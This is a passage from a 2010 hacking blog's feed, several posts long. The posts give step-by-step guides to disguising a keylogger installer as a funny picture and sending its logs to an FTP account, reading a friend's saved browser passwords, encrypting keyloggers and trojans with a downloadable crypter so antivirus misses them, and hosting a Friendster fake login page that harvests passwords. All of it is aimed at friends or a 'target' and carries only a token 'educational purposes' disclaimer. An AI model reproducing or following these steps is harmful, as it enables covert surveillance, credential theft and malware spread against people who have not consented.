bold;"&gt;next&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Head on over to:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://phpnet.us/"&gt;http://phpnet.us/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Make an account,entering your username password etc&lt;br /&gt;&lt;br /&gt;Save your FTP Account name and password. You'll need it in a moment.&lt;br /&gt;&lt;br /&gt;This site will be the site that holds all information recieved by the  keylogger.&lt;br /&gt;&lt;br /&gt;When you're done, scroll down a bit.&lt;br /&gt;&lt;br /&gt;Under "&lt;span style="font-weight: bold;"&gt;FTP Accounts&lt;/span&gt;", click "&lt;span style="font-weight: bold;"&gt;File Manager&lt;/span&gt;".&lt;br /&gt;&lt;br /&gt;Near the top, click the "&lt;span style="font-weight: bold;"&gt;New Dir&lt;/span&gt;"  button, and create a directory by any name you want.&lt;br /&gt;&lt;br /&gt;Now, hold that thought. Bring the keylogger back.&lt;br /&gt;&lt;br /&gt;In Ftp Host, put in:&lt;br /&gt;&lt;br /&gt;ftp.phpnet.us&lt;br /&gt;&lt;br /&gt;In "&lt;span style="font-weight: bold;"&gt;Remote Folder&lt;/span&gt;", put in the  new directory's name you made.&lt;br /&gt;&lt;br /&gt;Fill in your Username and Password.&lt;br /&gt;&lt;br /&gt;Leave leave Passive Mode checked &lt;br /&gt;&lt;br /&gt;Leave port alone as well. It's default.&lt;br /&gt;&lt;br /&gt;Now to make sure everything is correctly done, click test. It should  tell you it all went through. And to &lt;a href="" id="AdBriteInlineAd_double" name="AdBriteInlineAd_double" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;double&lt;/a&gt; check, you can  refresh your open window. Click your  directory and there should be a  test file in it.&lt;br /&gt;&lt;br /&gt;Click &lt;span style="font-weight: bold;"&gt;next&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Tick anything and everything you want.&lt;br /&gt;&lt;br /&gt;Click &lt;span style="font-weight: bold;"&gt;next&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;If you selected screenshots to be enabled, pick how you want them  delivered. Click next. If not, ignore this step.&lt;br /&gt;&lt;br /&gt;Browse where you want the keylogger to be placed. You can also change  the icon, which is nifty.IF you are sharing a picture with your friend  of yours,you can change the icon to a notepad and name it "Funny pic" or  some thing else,and they fal for it. &lt;br /&gt;&lt;br /&gt;Click &lt;span style="font-weight: bold;"&gt;Next&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;This screen will go over with you everything that you have chosen. Make  sure it's all correct.&lt;br /&gt;&lt;br /&gt;Click &lt;span style="font-weight: bold;"&gt;Finish.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now, if you appended the keylogger to something, you're going to need to  put the "install" and appended file into a .zip or .rar file.&lt;br /&gt;&lt;br /&gt;If not, you have the simple "&lt;span style="font-weight: bold;"&gt;Install&lt;/span&gt;"  on your desktop. Also, feel free to rename it to something like  "OMFGFunnypicture!!!.jpg"&lt;br /&gt;&lt;br /&gt;Now you are ready to &lt;span style="font-weight: bold;"&gt;install a  keylogger remotely&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Upload the file or .rar/.zip somewhere, and let your target download it.  They will double click it, and on their end, nothing will happen, but  secretly, they have been keylogged.&lt;br /&gt;&lt;br /&gt;Check your &lt;span style="font-weight: bold;"&gt;FTP Directory&lt;/span&gt; that  you made as frequently as you told it to send logs, and you'll have  everything you need.&lt;br /&gt;&lt;br /&gt;While installing a keylogger remotely the major critearea is antivirus  detection.I has post &lt;br /&gt;an article on &lt;b&gt;&lt;span style="color: #3d85c6;"&gt;How to bypass antivirus detection of  keylogger&lt;/span&gt;&lt;/b&gt;,check it out&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2009/09/hack-your-friends-account-password.html"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2009/07/how-to-hack-facebook-account.html"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2009/09/how-to-make-facebook-virus.html"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2009/10/free-myspace-background-layouts.html"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;a href="http://www.msn.com/"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;a href="http://www.blogger.com/www.yahoo.com"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;a href="http://www.google.com/"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-4294542748482035078?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/4294542748482035078/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-install-keylogger-remotely.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/4294542748482035078'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/4294542748482035078'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-install-keylogger-remotely.html' title='How to install a keylogger remotely'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-7306410385499613564</id><published>2010-01-31T07:06:00.001-08:00</published><updated>2010-01-31T07:06:47.108-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email hacking'/><title type='text'>Hack your friends account password</title><content type='html'>&lt;a href="" id="AdBriteInlineAd_Learn" name="AdBriteInlineAd_Learn" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;Learn&lt;/a&gt; to hack your friends  acount password&lt;br /&gt;well THis trick will only work if your &lt;a href="" id="AdBriteInlineAd_friend" name="AdBriteInlineAd_friend" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;friend&lt;/a&gt; has saved his  password, it allowes you to have a look at all the Username and Password  which your friend had asked my computer to remember which also included  my Internet Username and Password. But this is only possible in &lt;span class="IL_AD" id="IL_AD1"&gt;Mozila Firefox&lt;/span&gt; and &lt;a href="" id="AdBriteInlineAd_google" name="AdBriteInlineAd_google" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;google&lt;/a&gt; &lt;span class="IL_AD" id="IL_AD5"&gt;chrome&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;&lt;h1&gt;Hack your friends account password&lt;/h1&gt;&lt;br /&gt;To Hack your friends Password you only need even less than &lt;span class="IL_AD" id="IL_AD2"&gt;a minute&lt;/span&gt; and you can have a quick look  at your friends Usernames and Passwords.&lt;br /&gt;&lt;br /&gt;Just follow the steps:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;For Mozila Firefox:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;1.Open Mozila Firefox&lt;br /&gt;&lt;br /&gt;2.Goto &lt;b&gt;Tools&lt;/b&gt; -&amp;gt; &lt;b&gt;Options&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;3.In that goto &lt;b&gt;Privacy&lt;/b&gt; -&amp;gt; &lt;b&gt;Passwords&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;4.There you will find View &lt;b&gt;Saved Passwords&lt;/b&gt; Button &lt;a href="" id="AdBriteInlineAd_Click" name="AdBriteInlineAd_Click" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;Click&lt;/a&gt; on it.&lt;br /&gt;&lt;br /&gt;5.It will show you a &lt;a href="" id="AdBriteInlineAd_list" name="AdBriteInlineAd_list" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;list&lt;/a&gt; of websites with the  usernames. To get the Passwords Click on &lt;b&gt;Show Passwords&lt;/b&gt; Button.&lt;br /&gt;&lt;br /&gt;6.Now To get the Internet Password Just see for any IP address in the  website column this is the Ip address of that computer and Username and  Pass is what you want.&lt;br /&gt;&lt;br /&gt;7.You can get pass of any account just look for the site name whose  password you want to hack and on the right side you will get the  Username and Password&lt;br /&gt;&lt;br /&gt;&lt;b&gt;For Google chrome:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;1.Open &lt;b&gt;Google chrome&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;2.Goto &lt;b&gt;settings&lt;/b&gt; -&amp;gt; &lt;b&gt;Options&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;3.&lt;b&gt;Goto Personal stuff&lt;/b&gt; -&amp;gt; &lt;b&gt;Show saved passwords&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;So in this way you can hack your &lt;b&gt;friends account password&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-7306410385499613564?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/7306410385499613564/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/hack-your-friends-account-password.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/7306410385499613564'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/7306410385499613564'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/hack-your-friends-account-password.html' title='Hack your friends account password'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-4535944957348133518</id><published>2010-01-31T07:05:00.001-08:00</published><updated>2010-01-31T07:05:59.582-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email hacking'/><title type='text'>How to bypass antivirus detection</title><content type='html'>In my previous post "&lt;a href="http://rafayhackingarticles.blogspot.com/2009/09/how-to-install-keylogger-remotely.html"&gt;How  to install a keylogger remotely&lt;/a&gt;" i told you a step by step method  to &lt;b&gt;install a keylogger remotely&lt;/b&gt; and hack accounts,but after that i  received huge amount of email and readers asked me that is there any  way to avoid antivirus detection while installing a keylogger  remotely.so &lt;a href="" id="AdBriteInlineAd_today" name="AdBriteInlineAd_today" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;today&lt;/a&gt; i will tell you about  a software,by which you can bypass antivrus detection while installing a  keylogger remotely &lt;br /&gt;&lt;br /&gt;&lt;a href="" name="more"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h1&gt;How to bypass antivirus detection - UD Crypter&lt;/h1&gt;&lt;br /&gt;This Crypter is UD (Undetectable) and not FUD (Fully Undetectable) &lt;span class="IL_AD" id="IL_AD6"&gt;free software&lt;/span&gt;, &lt;span class="IL_AD" id="IL_AD4"&gt;because it is&lt;/span&gt; detected by Avira antivirus and even  Kaspersky antivirus as virus. Hence, it is 2/22 UD ie only 2 antiviruses  out of 22 detected this as virus. Thus, if your victim is using any  antivirus other than Avira and Kaspersky, then chill out guys.. here's  the &lt;a href="" id="AdBriteInlineAd_solution" name="AdBriteInlineAd_solution" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;solution&lt;/a&gt; for your  problem.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-size: x-large;"&gt;Download UD Crypter software:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;As I have explained previously, Crypter is used to&lt;b&gt; bypass antivirus  detection&lt;/b&gt; on victim computer. So, we use &lt;b&gt;Crypter software to  encrypt our Keylogger and trojan&lt;/b&gt;. Due to encryption by Crypter  software, whenever victim runs our sent keylogger or trojan on his  computer, his antivirus does not detect our keylogger as virus and our  keylogger is prevented from being deleted on victim computer.&lt;br /&gt;&lt;br /&gt;1.First of all &lt;b&gt;Download&lt;/b&gt; &lt;a href="http://www.ziddu.com/download/6699701/FUDCRYPTER.rar.html"&gt;Ud  crypter&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2. extract the Zip file  to obtain FUD Crypter free software.&lt;br /&gt;&lt;br /&gt;3. Run Krypter.exe application on your computer system.&lt;br /&gt;&lt;br /&gt;4. Now, browse to the file (keylogger or any trojan) you wanna crypt to  bypass antivirus detection and hit on "Encrypt".&lt;br /&gt;&lt;br /&gt;5. A new file will be &lt;a href="" id="AdBriteInlineAd_created" name="AdBriteInlineAd_created" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;created&lt;/a&gt; in same  directory. Now, scan this file with your antivirus and it will not  detect any virus (except Avira and Kaspersky).&lt;br /&gt;&lt;br /&gt;Note: You may get certain error on your computer like this:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_fMrF3L8CTmg/SsJEyj9mdpI/AAAAAAAAAJk/IYgSnbAp92k/s1600-h/cryptersoftware.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="UD crypter" border="0" src="http://1.bp.blogspot.com/_fMrF3L8CTmg/SsJEyj9mdpI/AAAAAAAAAJk/IYgSnbAp92k/s320/cryptersoftware.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;If you are getting this error, install Library file package to fix this  error.(Try googling)&lt;br /&gt;&lt;br /&gt;I hope now your are able to use this &lt;b&gt;UD Crypter to crypt keylogger or  trojan&lt;/b&gt;&lt;br /&gt;and &lt;b&gt;bypass antivirus detection&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I have also &lt;a href="" id="AdBriteInlineAd_posted" name="AdBriteInlineAd_posted" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;posted&lt;/a&gt; an article  regarding aradamax keylogger and its features check it out in my post "&lt;a href="http://rafayhackingarticles.blogspot.com/2009/04/hack-account-password-with-ardamax.html"&gt;&lt;b&gt;&lt;span style="color: #3d85c6;"&gt;Keylogger to hack passwords&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-4535944957348133518?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/4535944957348133518/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-bypass-antivirus-detection.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/4535944957348133518'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/4535944957348133518'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-bypass-antivirus-detection.html' title='How to bypass antivirus detection'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_fMrF3L8CTmg/SsJEyj9mdpI/AAAAAAAAAJk/IYgSnbAp92k/s72-c/cryptersoftware.jpg' height='72' width='72'/><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-2016259066752538392</id><published>2010-01-31T07:04:00.001-08:00</published><updated>2010-01-31T07:04:56.924-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email hacking'/><title type='text'>hack friendster account</title><content type='html'>&lt;a href="http://1.bp.blogspot.com/_fMrF3L8CTmg/SsneRyAWATI/AAAAAAAAAKU/AhTkRPnWq-w/s1600-h/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_fMrF3L8CTmg/SsneRyAWATI/AAAAAAAAAKU/AhTkRPnWq-w/s320/images.jpg" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;&lt;a href="" id="AdBriteInlineAd_Learn" name="AdBriteInlineAd_Learn" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;Learn&lt;/a&gt; to &lt;b&gt;hack friendster  account&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Are you curious to "&lt;b&gt;hack friendster accoun&lt;/b&gt;t" well then this &lt;a href="" id="AdBriteInlineAd_post" name="AdBriteInlineAd_post" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;post&lt;/a&gt; is just for you,Most  people ask me to tell us the easiest way to &lt;b&gt;hack friendster&lt;/b&gt;,so  here is the most easy way to &lt;b&gt;hack friendster account&lt;/b&gt; i.e. &lt;b&gt;phishing&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="" id="AdBriteInlineAd_Today" name="AdBriteInlineAd_Today" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;Today&lt;/a&gt; we will focus on the  easiest way i.e Fake &lt;span class="IL_AD" id="IL_AD2"&gt;login page&lt;/span&gt;&lt;br /&gt;A &lt;b&gt;Fake Login Page&lt;/b&gt; is a page that exactly resembles the original  login page of sites like &lt;b&gt;Yahoo&lt;/b&gt;,&lt;b&gt;Gmail&lt;/b&gt; etc.However, these  Fake login pages are created just for the purpose of stealing other’s  passwords.&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;&lt;h1&gt;&lt;span style="font-size: large;"&gt;How to hack friendster account -  Method&lt;/span&gt;&lt;/h1&gt;&lt;br /&gt;First of all download:&lt;a href="http://www.ziddu.com/download/6782752/ensterphishingbyrafayhackingarticles.blogspot.com.rar.html"&gt;Friendster  fake login page&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_fMrF3L8CTmg/SsneRyAWATI/AAAAAAAAAKU/AhTkRPnWq-w/s1600-h/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_fMrF3L8CTmg/SsneRyAWATI/AAAAAAAAAKU/AhTkRPnWq-w/s320/images.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;PROCEDURE:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;1.once you have downloded &lt;b&gt;Friendster fake login page&lt;/b&gt; now extract &lt;a href="" id="AdBriteInlineAd_contents" name="AdBriteInlineAd_contents" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;contents&lt;/a&gt; in a folder&lt;br /&gt;2.Now open friendster fake page in a wordpad or notepad,Now search for  the word Your "&lt;b&gt;login script&lt;/b&gt;" now change it to the name of your  login script,followed by &lt;b&gt;.php&lt;/b&gt;&lt;br /&gt;3.Save it .&lt;br /&gt;&lt;br /&gt;4.Create an id in www.110mb.com,www.ripway.com or t35.com.&lt;br /&gt;&lt;br /&gt;6.Then upload the contents into a directory&lt;br /&gt;&lt;br /&gt;7.For that,after &lt;a href="" id="AdBriteInlineAd_creating" name="AdBriteInlineAd_creating" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;creating&lt;/a&gt; an id you  should go to file manager and upload all these files.&lt;br /&gt;&lt;br /&gt;8.Then just go to your &lt;b&gt;friendster fake login page&lt;/b&gt; and try out  whether its working .&lt;br /&gt;After you type the file , a password file named pass.txt will be created  in the same directory .&lt;br /&gt;Then you can see what username and password you have entered.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h6&gt;Warning:This article How to hack friendster account is for  educational purposes&lt;/h6&gt;&lt;a href="" id="AdBriteInlineAd_Learn" name="AdBriteInlineAd_Learn" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;Learn&lt;/a&gt; to &lt;b&gt;hack friendster  account&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Are you curious to "&lt;b&gt;hack friendster accoun&lt;/b&gt;t" well then this &lt;a href="" id="AdBriteInlineAd_post" name="AdBriteInlineAd_post" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;post&lt;/a&gt; is just for you,Most  people ask me to tell us the easiest way to &lt;b&gt;hack friendster&lt;/b&gt;,so  here is the most easy way to &lt;b&gt;hack friendster account&lt;/b&gt; i.e. &lt;b&gt;phishing&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="" id="AdBriteInlineAd_Today" name="AdBriteInlineAd_Today" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;Today&lt;/a&gt; we will focus on the  easiest way i.e Fake &lt;span class="IL_AD" id="IL_AD2"&gt;login page&lt;/span&gt;&lt;br /&gt;A &lt;b&gt;Fake Login Page&lt;/b&gt; is a page that exactly resembles the original  login page of sites like &lt;b&gt;Yahoo&lt;/b&gt;,&lt;b&gt;Gmail&lt;/b&gt; etc.However, these  Fake login pages are created just for the purpose of stealing other’s  passwords.&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;&lt;h1&gt;&lt;span style="font-size: large;"&gt;How to hack friendster account -  Method&lt;/span&gt;&lt;/h1&gt;&lt;br /&gt;First of all download:&lt;a href="http://www.ziddu.com/download/6782752/ensterphishingbyrafayhackingarticles.blogspot.com.rar.html"&gt;Friendster  fake login page&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_fMrF3L8CTmg/SsneRyAWATI/AAAAAAAAAKU/AhTkRPnWq-w/s1600-h/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="100" src="http://1.bp.blogspot.com/_fMrF3L8CTmg/SsneRyAWATI/AAAAAAAAAKU/AhTkRPnWq-w/s200/images.jpg" width="200" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;PROCEDURE:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;1.once you have downloded &lt;b&gt;Friendster fake login page&lt;/b&gt; now extract &lt;a href="" id="AdBriteInlineAd_contents" name="AdBriteInlineAd_contents" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;contents&lt;/a&gt; in a folder&lt;br /&gt;2.Now open friendster fake page in a wordpad or notepad,Now search for  the word Your "&lt;b&gt;login script&lt;/b&gt;" now change it to the name of your  login script,followed by &lt;b&gt;.php&lt;/b&gt;&lt;br /&gt;3.Save it .&lt;br /&gt;&lt;br /&gt;4.Create an id in www.110mb.com,www.ripway.com or t35.com.&lt;br /&gt;&lt;br /&gt;6.Then upload the contents into a directory&lt;br /&gt;&lt;br /&gt;7.For that,after &lt;a href="" id="AdBriteInlineAd_creating" name="AdBriteInlineAd_creating" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;creating&lt;/a&gt; an id you  should go to file manager and upload all these files.&lt;br /&gt;&lt;br /&gt;8.Then just go to your &lt;b&gt;friendster fake login page&lt;/b&gt; and try out  whether its working .&lt;br /&gt;After you type the file , a password file named pass.txt will be created  in the same directory .&lt;br /&gt;Then you can see what username and password you have entered.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h6&gt;Warning:This article How to hack friendster account is for  educational purposes&lt;/h6&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-2016259066752538392?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/2016259066752538392/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/hack-friendster-account.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/2016259066752538392'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/2016259066752538392'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/hack-friendster-account.html' title='hack friendster account'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_fMrF3L8CTmg/SsneRyAWATI/AAAAAAAAAKU/AhTkRPnWq-w/s72-c/images.jpg' height='72' width='72'/><thr:total 